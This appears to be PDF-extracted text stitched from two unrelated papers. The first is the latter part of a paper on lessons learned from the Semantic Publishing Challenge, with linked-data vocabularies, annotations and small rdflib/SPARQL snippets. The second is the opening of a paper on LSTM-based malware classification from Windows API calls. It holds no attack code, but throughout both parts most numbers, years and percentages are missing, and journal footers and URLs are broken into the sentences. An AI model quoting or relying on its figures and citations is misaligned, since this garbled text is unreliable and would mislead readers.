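    ?paper a ex:Paper ;
           dcterms:identifier ?ident ;
           dcterms:title ?title ;
           ex:author ?author ;
           ex:affiliation ?affiliation ;
           ex:country ?country .
}
"""
for paper, ident, title, author, affiliation, country in g.query(query):
    print(paper, ident, title, author, affiliation, country)
```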
other entities were instead described in different ways and with different granularity. that happened, for instance, to the entities organization, funding agency and grant. in certain cases they are identified as separate entities and in other cases their details constitute part of other entities descriptions (and are expressed as data or object properties). the coverage of the data models was also heterogeneous: for the edition, for instance, not all solutions identify the sections and capture the notion of caption of figures and tables. conclusion. based on the aforementioned, we observe a trend of converging in respect to the model the ceur-ws.org dataset should have according to the submitted solutions. most solutions converge on the main identified concepts in the data (conference, workshop, proceedings, paper and person) and on the ceur-ws.org dataset’s graph at least for task , namely the publications’ metadata. the way the tasks and their corresponding queries are described contributes towards this direction. vocabularies observation. there is a wide range of vocabularies and ontologies that can be used to annotate scholarly data. most of the solutions preferred to (re)use almost the same existing ontologies and vocabularies, as summarized in table . six out of twelve solutions for both task and used the semantic web for research communities (swrc) vocabulary (swrc, http://swrc.ontoware.org/ontology#), five used the bibliographic ontology (bibo) vocabulary (bibo, http://purl.org/ontology/bibo/) and three used the semantic web conference (swc) vocabulary (swc, http://data.semanticweb.org/ns/swc/ontology#). moreover, six solutions used one or more vocabularies of the semantic publishing and referencing ontologies (spar, http://www.sparontologies.net/). in particular, five solutions used the frbr-aligned bibliographic ontology (fabio, http://purl.org/spar/ fabio/) ontology, three the publishing roles ontology (pro, http://purl.org/spar/pro/), dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://swrc.ontoware.org/ontology# http://purl.org/ontology/bibo/ http://data.semanticweb.org/ns/swc/ontology# http://www.sparontologies.net/ http://purl.org/spar/fabio/ http://purl.org/spar/fabio/ http://purl.org/spar/pro/ http://dx.doi.org/ . /peerj-cs. three the document components ontology (doco, http://purl.org/spar/doco/), two the bibliographic reference ontology (biro, http://purl.org/spar/biro/), two the funding, research administration and projects ontology (frapo, http://purl.org/cerif/frapo/) and one the functional requirements for bibliographic records (frbr, http://purl.org/ spar/frbr/). besides the domain-specific vocabularies and ontologies, eight solutions used the dublin core vocabulary (dc, http://purl.org/dc/elements/ . / and dcterms, http://purl.org/dc/terms/), eight the friend of a friend vocabulary (foaf , http://xmlns.com/ foaf/ . /), five solutions used the dbpedia ontology (dbo, http://dbpedia.org/ontology/), three the vcard (vcard, http://www.w .org/ /vcard/ns#) and two the event (event ontology, http://purl.org/net/c dm/event.owl#) and timeline (timeline ontology, http://purl.org/net/c dm/timeline.owl#) ontologies and schema.org (http://schema.org). last, there were four solutions that used their own custom vocabularies, in combination with existing ones in most cases, but only one used barely its custom vocabulary. 
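the sketch below illustrates the vocabulary-reuse spirit reported above: a single workshop paper described with rdflib by mixing a few of the listed vocabularies (swrc, bibo, fabio, foaf, dublin core), together with an explicit dcterms:license statement as recommended in the license lesson earlier. the resource uris and literal values are invented, and this particular combination of terms is only one of the many the solutions actually chose.

```python
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import DCTERMS, FOAF, RDF

SWRC = Namespace("http://swrc.ontoware.org/ontology#")
BIBO = Namespace("http://purl.org/ontology/bibo/")
FABIO = Namespace("http://purl.org/spar/fabio/")

g = Graph()
for prefix, ns in [("swrc", SWRC), ("bibo", BIBO), ("fabio", FABIO)]:
    g.bind(prefix, ns)

paper = URIRef("http://example.org/Vol-0000/paper1")    # invented URIs
author = URIRef("http://example.org/person/jane-doe")
dataset = URIRef("http://example.org/dataset")

g.add((paper, RDF.type, FABIO.ConferencePaper))
g.add((paper, DCTERMS.title, Literal("An Example Paper")))
g.add((paper, DCTERMS.creator, author))
g.add((paper, SWRC.year, Literal("2015")))               # invented example value
g.add((paper, BIBO.cites, URIRef("http://example.org/paper2")))
g.add((author, RDF.type, FOAF.Person))
g.add((author, FOAF.name, Literal("Jane Doe")))
# An explicit license statement on the dataset, as the license lesson recommends.
g.add((dataset, DCTERMS.license,
       URIRef("https://creativecommons.org/licenses/by/4.0/")))

print(g.serialize(format="turtle"))
```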
in contrast to task solutions, which all converged on using same vocabularies and ontologies intuitively, task solutions reused a wider range and relatively different vocabularies and ontologies to annotate same entities appearing in the same data, which is extracted from pdf documents. this is a consequence of the rather diverse data models considered by different solutions. interestingly, most task solutions use sub-ontologies of the spar ontologies family. last, most solutions reuse the three most popular vocabularies in the education field according to schmachtenberg, bizer & paulheim ( ). the general purpose vocabularies—such as foaf—used by the participants are also listed high in the same ranking. conclusion. it is evident that the spirit of vocabulary reuse gains traction. however, it is interesting that different solutions used the same ontologies to annotate the same data differently (see also ‘annotations’ section). annotations observation. even though all solutions used almost the same vocabularies, not all of them used the same vocabulary terms to annotate the same entities. as far as task is concerned, all solutions only converged on annotating persons using the foaf:person class. for the other main concepts the situation was heterogeneous, as reported in table . a few of them also explicitly annotated persons using the foaf:agent class, even though foaf:person is a subclass of foaf:agent. foaf:agent was also used by one of the solutions during the first edition, but it was then replaced by the more explicit foaf:person. the conference concept was well-captured by all solutions. it is interesting to note that, for the first edition, most solutions used relatively generic vocabulary terms, e.g., swrc:event, swc:event or swc:organizedevent to annotate the data. however, in the second edition, most solutions preferred to use more explicit vocabulary terms for the same concept, e.g., swrc:conference and bibo:conference, while they also maintained the more generic vocabulary terms for events. the same occurred with the paper concept. the edition datasets were annotated using more generic vocabulary terms, e.g., swrc:publication or even foaf:document, whereas in dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/spar/doco/ http://purl.org/spar/biro/ http://purl.org/cerif/frapo/ http://purl.org/spar/frbr/ http://purl.org/spar/frbr/ http://purl.org/dc/elements/ . / http://purl.org/dc/terms/ http://xmlns.com/foaf/ . / http://xmlns.com/foaf/ . / http://dbpedia.org/ontology/ http://www.w .org/ /vcard/ns# http://purl.org/net/c dm/event.owl# http://purl.org/net/c dm/timeline.owl# http://schema.org http://dx.doi.org/ . /peerj-cs. more explicit terms were preferred, such as swrc:inproceedings or bibo:article. in particular swrc:inproceedings was adopted by three out of four solutions. in contrast to task solutions, which focus on identifying and describing concrete entities, task solutions mainly focus on capturing their properties. this is also evident from the fact that task solutions rarely provide the entities’ types, whereas task solutions always do, even though this information could be inferred from the properties used. moreover, task solutions generate much fewer entities than task solutions. all task solutions use approximately the same number of properties. it is interesting though to note that solutions that follow in principle the linguistic approach tend to use more predicates, which are more explicit and more descriptive too. 
all solutions have approximately the same number of predicates, but their precision is still not accurate. only one of task solutions (solution . ) has a significantly higher number of predicates compared to the other solutions. this occurs because different uris are used for the same relationships appearing in different files to annotate the data. for instance, the section-title property appears with different uris, such as the following: http://ceur-ws.org/vol- /paper #section-title, or http://ceur-ws.org/vol- /paper_ #section-title. however, such a choice prevents easily identifying same relationships. dcmi is the vocabulary most frequently used by all solutions for annotating the identifier and the title. rdf(s) is also used for the title (represented as rdfs:label), as well as for the entities’ types. for the remaining properties, a wide range of different vocabularies are considered, but they do not converge on their choices. indicatively: one of the solutions considers schema:mentions to describe a citation, whereas other solutions consider bibo:cites or biro:references. in the same context, some solutions associate authors to papers with the dcterms:creator property, whereas others consider foaf:maker. moreover, some solutions indicate the affiliation using the swrc:affiliation property, whereas others use pro:relatestoorganization, or some solutions represent the publication year using swrc:year, whereas others use fabio:haspublicationyear. last, it is interesting to note that solutions may even use vocabulary terms that do not exist, such as swrc:section. conclusion. on the one hand, the more familiar the data publishers get with the data, the more explicit they become with the annotations they use and the more they converge on the choices they make. on the other hand, the way different solutions extract particular properties reflects on the final data model. lessons learned from submitted rdf datasets in this section, we discuss the different solutions with respect to the rdf dataset they produce. successive submissions improvements observation. from the first edition to the second edition of the semantic publishing challenge, we noticed that the participants who re-submitted their solutions had improved the overall dataset, not only the parts useful to answer the queries. for dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/vol- /paper #section-title http://ceur-ws.org/vol- /paper_ #section-title http://dx.doi.org/ . /peerj-cs. instance, all three solutions of task that had participated in both the and the editions modified the way they represented their data, and this resulted in corresponding improvements to the overall dataset. indicatively, as far as task is concerned, solution . addressed a number of shortcom- ings the previous tool’s version had, in particular regarding data transformations, which might have influenced their precision improvement. heyvaert et al. ( ) also assessed their mappings’ quality to verify the schema is valid with respect to the used vocabularies and ontologies. to address the same issue and avoid inconsistencies in their dataset, solution . preferred to align different ontologies’ classes and properties, e.g., aligning bibo to the swrc ontologies, as swc already has some dependencies on swrc. as far as task is concerned, some parts of solution . , for instance, were changed for participating in the edition. 
the authors employed different processing steps of their tool, which were not used in the previous edition, e.g., processing section headings, hierarchy and captions, but they also introduced novel aspects driven by the challenge tasks and queries, e.g., extracting links from supplementary material. among the changes of solution . , it was the pdf extraction tool used, whose change might have partially contributed to their recall improvement, while a number of additional or new conditional heuristics most probably led to their precision improvement. overall, it was observed that improvements to extraction might reflect on the solutions’ recall, whereas improvements to text analysis on their precision. conclusion. the improvement of the dataset was evident on some aspects and indeed the results were satisfying, but we still see room for improvement. it is interesting though to note that solutions did not remain focused on improving just the data extraction parts of the challenge, but also the data modeling, even though the latter is not directly assessed by the challenge. dataset structure observation. the different solutions differ significantly with respect to the size of the produced dataset. this happens for different reasons. solution . shows an extraordinary number of triples compared to other solutions. this occurs to a certain extent because each concept is annotated with at least two classes, making one fourth of the dataset to be type declarations. moreover, they include even annotations that indicate the type of the resource or property on a very low level, namely they use rdfs:class, rdfs:property, as well as owl:objectproperty or owl:annotationproperty etc., which counts for almost , triples of the total dataset. solution . also shows a high number of triples. this occurs because the same dataset contains triples describing the structure of the html page, as well as triples describing the actual content of the pages. nevertheless, the main reason that causes the flow of triples is the fact that a new uri is generated each time a concept appears in one of the ceur-ws.org volumes. for instance, the person ruben verborgh appears to have uris, e.g., http://ceur-ws.org/vol- /#rubeniverborgh for the vol- proceedings or http://ceur-ws.org/vol- /#rubeniverborgh for the vol- proceedings. the person christoph lange appears to have distinct uris, e.g., for dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/vol- /#rubeniverborgh http://ceur-ws.org/vol- /#rubeniverborgh http://dx.doi.org/ . /peerj-cs. the definition of task was not explicit with regard to whether different persons with the same name (within or across different workshops proceedings volumes) should be assumed to be the same person or not. our current work towards the release of a consolidated ceur-ws.org dataset shows that the far majority of same names refers to the same person, which is plausible as ceur-ws.org focuses on the relatively small computer science community. however, a general solution would be wrong to simply assume that same names mean same persons, whereas a full disambiguation of names would require a lot of information to be taken into account beyond the proceedings’ tables of content: the title pages of the pdf papers plus possibly external resources. our instructions did not prescribe whether or not participants should assume persons with the same name to be the same. 
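one way to avoid minting a new person uri per proceedings volume is to derive the uri from a normalised form of the name, under the working assumption, discussed in the surrounding note, that within ceur-ws.org the same name denotes the same person. the base uri and the normalisation rules in the python sketch below are illustrative choices, not those of any particular solution.

```python
import re
import unicodedata

BASE = "http://example.org/person/"   # illustrative base URI, not CEUR-WS policy
_minted = {}

def person_uri(name: str) -> str:
    # Same normalised name -> same URI, across all proceedings volumes.
    ascii_name = unicodedata.normalize("NFKD", name).encode("ascii", "ignore").decode()
    slug = re.sub(r"[^a-z0-9]+", "-", ascii_name.lower()).strip("-")
    return _minted.setdefault(slug, BASE + slug)

# The same person mentioned in two different volumes receives one URI ...
print(person_uri("Christoph Lange"))
print(person_uri("christoph  lange"))
# ... while a different name yields a different URI.
print(person_uri("Ruben Verborgh"))
```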
in the reality of the ceur-ws.org data, there are very few cases in which the same name refers to two different persons, as the data covers the relatively small domain of computer science researchers. the person christoph lange, for instance, is identified by http://ceur-ws.org/vol- /#christophilange in one proceedings volume and by http://ceur-ws.org/vol- /#christophilange in another. solutions . and . produce approximately the same number of triples in both editions. conclusion. there is a very high heterogeneity in the produced datasets; although solutions tend to agree on used vocabularies, their design choices are very different and, as a consequence, the number and organization of the triples is very heterogeneous. coverage observation. we further noticed that solutions rarely agree upon the extracted information. for instance, some skip the extraction of wrong data or certain other information. overall, we observed significant differences with respect to the number of identified entities per category. the results for task are summarized in tables and , while the results for task are summarized in table . produced datasets were very heterogeneous in terms of size, number of triples and entities. as far as task is concerned, apparently, solution . and solution . used the individual pages to identify the proceedings, whereas solution . and solution . used the index page to identify the proceedings, which explains the big difference in the number of proceedings entities. the number of identified papers is also significantly different among the different solutions, but in the persons case we observe the greatest variation in terms of numbers because of different practices of assigning uris; a few solutions reuse uris across different proceedings volumes, others do not. as far as task is concerned, solutions tend to omit certain subtasks and to optimize their performance on others due to the nature of the task: queries were quite heterogeneous, with a clear distinction, for instance, between the analysis of the structural components and of the textual content of the papers. in one edition, for instance, the best performing solution focused on precisely addressing the subtasks which were related to the document structure and totally omitted queries related to funding and ontologies, as shown in table . similarly, in the following edition, certain solutions completely omitted the queries that were related to supplementary material or to table and picture captions. consequently, the dataset size, as well as the number of triples and entities, significantly diverge among the solutions. conclusion. the datasets' heterogeneity is also evident in the amount and type of information each dataset provides. however, the more the solutions improve, the more they converge, at least regarding the number of retrieved and/or distinctly identified entities. lessons learned from the solutions with respect to the evaluation in this section, we discuss the different solutions with respect to the dataset evaluation. ranking observation. for task , the performance ranking of the three tools carried over from the previous edition has not changed, but their performance has improved, except for solution . , which improved precision while its recall remained the same. disregarding the two queries that were new in the later edition, solution . , which had won the best performance award in the earlier edition, performs almost as well as solution . .
/peerj-cs. the trend was slightly different for task : all tools participating in the challenge for the second time increased their performance, but the overall ranking changed. solution . obtained a higher score than solution . in , contrarily to what happened in . the position of solution . was stable. conclusion. continuity helps participants to improve their tools; the overall ranking keeps stable if the tasks (and queries) are kept stable; adjustments to the tasks (and queries) may impact the ranking, favoring one team more than another. new and legacy solutions observation. task participants both in and had an improved version of different aspects of their solution, which resulted in correspondingly improved versions of the final dataset. the new solution . , which introduced a fundamentally new approach, achieved equally good results as the best solution of . the same trend was evident in task , with a general improvement of all solutions that were re-proposed for the second year ( and ). conclusion. legacy solutions might be able to improve and bring stable and good results, however there is still room for improvement and mainly for fundamentally new ideas that surpass problems that legacy solutions cannot deal with. equal chances observation. solution . , the winners of task in , participated in with an improved version but did not win. the winner was a new tool with a brand new approach (solution . ). the same happened for task : in , one winner (solution . ) was a brand-new solution, the other one (solution . ) was an extension and improvement of a legacy solution but did not win the year before. conclusion. the winners were not the same in subsequent versions of the challenge: creativity won. discussion: challenge impact on linked data quality in the ‘introduction’ section we motivated the semantic publishing challenge as a means of producing high-quality linked data. in this section, we assess the potential impact of the challenge on the quality of the linked data produced. to be more precise, the quality of the linked data produced by the tools submitted has been assessed by comparing the output of a number of prescribed queries against our gold standard and measuring precision and recall, as explained in ‘tasks evaluation’ section. assessing the quality of linked data by running queries over it is a common approach, as the comparison of tools by zaveri et al. ( ) confirms, whose recent survey we refer to for a comprehensive review of the state of the art regarding linked data quality assessment. therefore, a challenge designed as the semantic publishing challenge could act as a means to assess the linked data quality, and, the better the results, the higher the linked data quality is expected to be. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the specific quality metrics that our evaluation setup assesses can be connected to the general quality dimensions (accessibility, intrinsic, contextual and representational) and certain of their corresponding metrics, as they are identified by zaveri et al. ( ). moreover, few other quality dimensions’ metrics that are not covered by the challenge’s evaluation are assessed in the frame of this review. note that some metrics are applicable for all tasks, whereas others are only for a certain task. accessibility dimensions the accessibility dimensions involve aspects related to the linked data access, authenticity and retrieval (zaveri et al., ). 
our challenge required participants to make their data available, forcing this way the solutions to cover the availability dimension. making the data available as an rdf dump was the minimum requirement set by the challenge, covering this way the accessibility of the rdf dumps metric. participants were also encouraged to publish their data via other triple pattern fragment (tpf) interfaces, such as sparql endpoints, but assessing its availability was not part of the challenge’s evaluation. moreover, participants were encouraged to publish their data using a certain license, without being a requirement though, boosting this way the licensing dimension (the corresponding detailed discussion is available in ‘license’). while the aforementioned referred to all challenge’s tasks, the interlinking dimension was only promoted by task , which, after all, is its actual goal. overall, even though the submitted solutions only made their datasets available as rdf dumps and did not specify the license, the challenge achieved to enable solutions to achieve the minimum requirement of making the produced datasets accessible. it is evident that, if the challenge had turned high values w.r.t. each of the aforementioned metrics mandatory, the produced dataset accessibility would have been increased. intrinsic dimensions according to zaveri et al. ( ), the intrinsic dimensions focus on whether the information correctly, compactly and completely represents the real world and is logically consistent in itself. as the semantic publishing challenge requires sparql queries to be executed against the linked data produced by the different solutions, the syntactic validity of the dataset is a prerequisite, boosting this way the metrics for syntax error free documents and the absence of malformed datatypes. while our challenge evaluation covers well the syntactic validity, the semantic accuracy is not evaluated. nevertheless, the metric which is related to the misuse of properties is discussed and assessed in a qualitative way in the ‘annotations’ section of this paper, but it is not assessed quantitatively. similarly, the population completeness, i.e., the percentage of real-world objects of a particular type that are represented in a dataset, is indirectly evaluated on the side. namely, it is not thoroughly assessed if all real-world entities appear, but to successfully answer the evaluation queries, the population completeness is prerequisite. moreover, a comparative evaluation of the population completeness is performed in this work (see more detailed discussion at the ‘coverage’ section and tables , ). last, even though the solutions’ dataset consistency dimension could have been evaluated and shed more light to their quality, it was not done by any of the challenge’s series so far. all in all, as the challenge was not focused on dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assessing the dataset quality, certain metrics of the intrinsic dimension were not covered intentionally, others were indirectly assessed, while a few others were only discussed in this paper. nevertheless, if it had been intended, the challenge could have covered even more metrics of the intrinsic dimension and could have reinforced the datasets quality even more. contextual dimensions the contextual dimensions highly depend on the context of the task at hand. in the case of relevancy dimension, the semantic publishing challenge did not perform any relevant evaluation. 
nevertheless, in this paper the coverage metric is addressed. to be more precise, in the ‘coverage’ section, the coverage is thoroughly discussed. the semantic publishing challenge does contribute to the timeliness dimension. to be more precise, thanks to its continuity, it is assured that at least every year the challenge is organized, a new dataset for the underlying ceur-ws.org data is generated, boosting the freshness metric. in particular the final extraction has to be made from the evaluation dataset published a few days before the final submission deadline. as a conclusion, the challenge succeeded in indirectly promoting the coverage and timeliness dimensions; however, there is potential for other dimensions to be covered as well. representational dimension the representational dimension captures aspects related to the data design (zaveri et al., ). as far as the interoperability dimension is concerned, the semantic publishing challenge promotes the reuse of existing terms and vocabularies and, as shown in table and discussed in the ‘annotations’ section, the semantic publishing challenge achieves its goal of promoting the re-use of existing vocabularies, even though the corresponding metric is not evaluated automatically. moreover, thanks to task , the semantic publishing challenge also promotes the re-use of existing terms. even though it failed to attract participation, it is proven that such a task contributes into increasing the overall dataset quality. thus, the challenge enables the produced datasets to cover even the representational quality dimension. conclusions one of the objectives of the semantic publishing challenge is to produce linked data that contributes to improving scholarly communication. nevertheless, the lessons learned from organizing this challenge are not only applicable in the case of a challenge on semantic publishing but in the case of other challenges too. therefore, this work shed light not only on the three editions of this challenge organized by ourselves and distilled lessons learned from our experience, but we have also validated them against other challenges and concluded on general best practices for organizing such challenges. in a nutshell, continuity both in terms of the dataset and in terms of the tasks is important. nevertheless, tasks should remain distinct, but they should refer to the same training and evaluation dataset, while participants’ feedback should be taken into consideration to define or refine the tasks. regarding the output, the larger the evaluation dataset is and the less overlapping with the training dataset, the best it is for verifying high coverage. the sooner the evaluation dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tool is made available, the better it is for the quality of the final output. finally, it is a critical incentive for the participants to know how their output is intended to be reused. besides the challenge’s organizational aspects, we looked for evidence from the solutions proposed by the participants. therefore, we analyzed them, reported our observations and came up with different conclusions related to linked data publishing practices followed by different participants. there are several positive aspects, among them the high participation and the quality of the produced results. this work allowed us to share those observations on semantifying scholarly data, using different ontological models, refining and extending existing datasets. 
even though the semantic publishing challenge focuses on scholarly data, the conclusions we draw based on our analysis are of interest for the entire community that publishes linked data. the possibility of sharing knowledge and solutions among participants was another key factor of the semantic publishing challenge. in a nutshell, most solutions relied on generic and open-sourced tools, which allows and enables their reuse for corresponding cases. solutions, and thus the tools that produce them, have improved from one edition to the other. even though different methodologies were followed, there are certain prevailing approaches—based on structure/layout or on linguistics—which were instantiated in different ways. despite the fact that tools diverge, the produced data model and final annotations converge, as solutions become more mature from one edition to the other, while well-known vocabularies are reused. last, we assessed how the challenge’s organization reflects on the submitted solutions’ output, namely how the challenge’s organization affects the datasets’ quality. we showed that indeed the challenge’s organization may have a positive impact on increasing the quality of the linked data produced. additional information and declarations funding research activities described in this paper were funded by ghent university, iminds, the institute for the promotion of innovation by science and technology in flanders (iwt), the research foundation—flanders (fwo) and the european union under grant agreement no. (openaire ) and others. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ghent university, imec. flanders innovation & entrepreneurship (vlaio). european union: . competing interests the authors declare there are no competing interests. christoph lange is an employee of enterprise information systems. anastasia dimou and erik mannens are employees of imec. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • anastasia dimou, sahar vahdati, angelo di iorio and christoph lange conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ruben verborgh wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • erik mannens reviewed drafts of the paper. data availability the following information was supplied regarding data availability: ( ) sempub : https://github.com/ceurws/lod/wiki/sempub ( ) sempub : https://github.com/ceurws/lod/wiki/sempub ( ) sempub : http://challenges. .eswc-conferences.org/index.php/sempub. references ahmad r, afzal mt, qadir ma. . information extraction for pdf sources based on rule-based system using integrated formats. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no. , cham: springer international publishing. bertin m, atanassova i. . extraction and characterization of citations in scientific papers. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. 
submitted april accepted july published july corresponding author ferhat ozgur catak, ferhat.o.catak@ntnu.no, ozgur.catak@tubitak.gov.tr academic editor lerina aversano additional information and declarations can be found on page doi . /peerj-cs. copyright catak et al. distributed under creative commons cc-by . open access deep learning based sequential model for malware analysis using windows exe api calls ferhat ozgur catak, ahmet faruk yazı, ogerta elezaj and javed ahmed department of information security and communication technology, ntnu norwegian university of science and technology, gjøvik, norway; cyber security engineering, istanbul sehir university, istanbul, turkey; tubitak bilgem cyber security institute, kocaeli, turkey. abstract malware development has seen diversity in terms of architecture and features. this advancement in the competencies of malware poses a severe threat and opens new research dimensions in malware detection.
this study is focused on metamorphic malware, which is the most advanced member of the malware family. it is quite impossible for anti-virus applications using traditional signature-based methods to detect metamorphic malware, which makes it difficult to classify this type of malware accordingly. recent research literature about malware detection and classification discusses this issue related to malware behavior. the main goal of this paper is to develop a classification method according to malware types by taking into consideration the behavior of malware. we started this research by developing a new dataset containing api calls made on the windows operating system, which represents the behavior of malicious software. the types of malware included in the dataset are adware, backdoor, downloader, dropper, spyware, trojan, virus, and worm. the classification method used in this study is lstm (long short-term memory), which is a widely used classification method for sequential data. the results obtained by the classifier demonstrate accuracy up to % with an f1-score of . , which is quite satisfactory. we also run our experiments with binary and multi-class malware datasets to show the classification performance of the lstm model. another significant contribution of this research paper is the development of a new dataset for windows operating systems based on api calls. to the best of our knowledge, no such dataset was available before our research. the availability of our dataset on github allows the research community in the domain of malware detection to benefit from it and make further contributions to this domain. subjects artificial intelligence, data mining and machine learning, security and privacy keywords malware analysis, sequential models, network security, long-short-term memory, malware dataset introduction malicious software, commonly known as malware, is any software intentionally designed to cause damage to computer systems and compromise user security. an application or code is considered malware if it secretly acts against the interests of the computer user and performs malicious activities. malware targets various platforms such as servers, personal computers, mobile phones, and cameras to gain unauthorized access, steal personal data, and disrupt the normal function of the system. malware has been notorious for its malicious activities and attacks for decades. malware development has become a serious activity lately as the number of target platforms increases day by day, which significantly raises the importance of developing adequate techniques to detect them. dynamic analysis of malware on different platforms is an evolving and challenging task. according to recent statistics, million new malware samples have been infecting systems in the first months of (https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun- .pdf).
this is evidence that malware is a significant threat to systems, and most of the time it surpasses the capacities of malware analysts. accordingly, great efforts are needed to protect against malware attacks. one approach to deal with the malware protection problem is to identify the malicious software and evaluate its behavior. usually, this problem is solved through the analysis of malware behavior, which closely follows the malicious software family, since the family also reflects the pattern of malicious behavior. there are very few studies that have demonstrated methods of classification according to malware families. proper malware labeling is a challenging issue in this domain: one anti-virus application can detect a sample as a trojan, whereas the same sample is labeled as a worm by another anti-virus application. with the advent of sophisticated malware frameworks, it is difficult to handle these problems. the main practical challenge faced by researchers is that malware has achieved a very complicated level of competence and effectiveness, which allows for constant change of the code signatures (rad, masrom & ibrahim, ). consequently, anti-virus applications that use conventional signature-based detection methods cannot detect such malware. although a metamorphic malware manifests itself with different code sequences in different environments, it must adopt the same behavior in all settings, because it was developed to conduct a specific malicious activity. using this information, nearly all the methods used for the detection and classification of metamorphic malware tackle the behavioral characteristics and not the malware's structural features. data such as windows api calls, dns resolutions, and registry read/write operations are used in such methods to reflect malicious software behavior. the complete set of operating system api calls made by any software shows the overall behavior of that program. by examining these actions in depth, it can be learned whether the program is malware and, if it is, which malware family it belongs to. each operating system api call made by malware is a data attribute, and the sequence in which those api calls are generated is also critical: a malware family performing specific api calls in a specific order exhibits a behavior. lstm (long-short term memory), one of the deep learning methods, has been commonly used in the processing of such time-sequential data (shamshirband, rabczuk & chau, ). our research is based on the analysis of api calls made by malware on the windows operating system. we analyze the api calls made by different types of malware on the system to build a collection of malware-based api calls. this dataset enables the development of a method that can be useful for the identification of malware based on its behavior. we also construct malware detection models based on this dataset using the lstm algorithm. this model classifies malware even though it has undergone structural changes, i.e., metamorphic malware, as long as it behaves in the operating system like a known type of malware (shamshirband & chronopoulos, ). in our previous work (yazi, catak & gul, ), we applied a single layer lstm model to detect the malware classes.
in another work (Çatak & yazi, ), we describe our publicly available dataset in detail. our research has made the following major contributions: • a new dataset has been developed for malware detection on windows os. such a dataset did not exist in this domain. • malware was analyzed, and api calls were recorded, by running the samples in an isolated sandbox environment. • using the lstm algorithm, which is commonly used for text classification, malware detection was modeled as a text classification problem, and a detection model for the malware type was developed. the rest of the article is organized as follows: section briefly introduces some of the earlier works related to our problem. section describes windows api calls, the sandbox environment and the lstm algorithm. section shows our system model. section evaluates the proposed learning model. section concludes this paper. related work leder, steinbock & martini ( ) take into consideration structural changes of metamorphic malware. using the vsa (value set analysis) method, detection was realized by extracting the unchanging code structure found in malicious software, concluding that if there is no behavioral change in samples of metamorphic malware, the detection accuracy can be % (leder, steinbock & martini, ). although they examined metamorphic software, they only used operating system processes. vinod et al. ( ) generated malware signatures by using windows api call sequences of metamorphic malware. the authors proposed a method for identifying and classifying malware families using these signatures. in this study, malicious software was created from each of the ngvck, mpcgen, g , and il_smg families by using the vx heavens application, and a dataset was created by using software emulators in order to obtain windows api call sequences. the accuracy achieved by the proposed method is %, %, %, and % for each family respectively (vinod et al., ). they obtained a high detection rate; however, because they use signatures, attackers can evade this detection method. qiao et al. ( ) developed a detection model by considering the behavior of malware. the api call sequences of malicious software on the windows operating system were obtained by using the cuckoo sandbox application, and an analysis method was developed by extracting frequently occurring elements from these call sequences. the dataset used during the analyses contains malware samples, and the accuracy rate obtained is % (qiao et al., ). this work is very close to our study because they use api calls; however, since they do not model the api call sequences using a sequential method, they lose this information. cheng, tsai & yang ( ) proposed an improved classification method for the behavior of malware based on information retrieval theory. windows api call sequences of malware obtained from honeypots with the help of the cuckoo sandbox application were preprocessed with the aim of representing malicious behavior. these documents were analyzed using tf-idf weights, and a similarity measurement method was applied in order to extract similarity characteristics of the malicious software. a classification model was built using these features, and the accuracy rate obtained was . % (cheng, tsai & yang, ). this work is also close to our research because they use api calls.
however, since they use tf-idf representations of the calls, they lose this sequence information. mehra, jain & uppal ( ) proposed a method to classify malware, where the malware samples were created using vx heavens. control flow and api call graphs were extracted from this malicious software, and the gourmand feature selection algorithm was used to extract the required call properties. the proposed solution was implemented using the weka tool, whereas the classification was made using histogram and chi-square difference measurement formulas according to malware families. the classification accuracy varies between . % and . % for different families (mehra, jain & uppal, ). the number of malware samples contained in the dataset they use is relatively low. also, as in other studies, the api call sequence was not used. pirscoveanu et al. ( ) used a supervised algorithm, random forests, for the classification of malware. a total of , malware behaviors were collected using the cuckoo sandbox application. dns requests, accessed files, mutexes, and registry keys were used together with the windows api calls for classification. in addition, for the class labels of the malicious software, the tags detected by the avast application were taken from the results provided by the virustotal service. trojan, potentially unwanted program, adware, and rootkit classes are used for classification. the weighted average area under curve (auc) value of the proposed method is . (pirscoveanu et al., ). the number of malware samples contained in the dataset they use is relatively high; again, the api call sequence was not used. ahmed, nepal & kim proposed a different approach to malware detection. the detection of malicious software in this study is based not on the characteristics of the malicious software itself but on the effects it has on the system. so, the structural and behavioral features of malware are not considered in the detection process; instead, the method is limited to the detection of behavior that is abnormal for the system in an ordinary situation. in this way, the authors claimed that advanced malicious software such as polymorphic, metamorphic, and zero-day malware could be detected (ahmed, nepal & kim, ). sami et al. ( ) developed a framework based on mining api calls of pe files for malware detection. the framework includes a pe analyzer, feature generator, feature selector, and a classifier. the authors generate a set of discriminative and domain-interpretable features by reading api call sets in a collection of pe files, and the classifier is trained using these features. the authors also created the first public dataset and improved existing api-mining methods for malware detection. the accuracy and detection rate are improved by . % and . %, respectively, and the false alarm rate is reduced from . % to . % (sami et al., ). their approach again ignores the call sequences. alazab, venkataraman & watters ( ) used a four-step methodology to extract api call features using a fully automated method. the authors disassemble, analyze, and extract the api function calls from the binary content of malware using the static analysis tool idapro disassembler to classify a program executable as malicious or benign. statistical tests were performed on the extracted calls to determine the malware class based on suspicious behavior, and a sample of malware was used to conduct experimental tests.
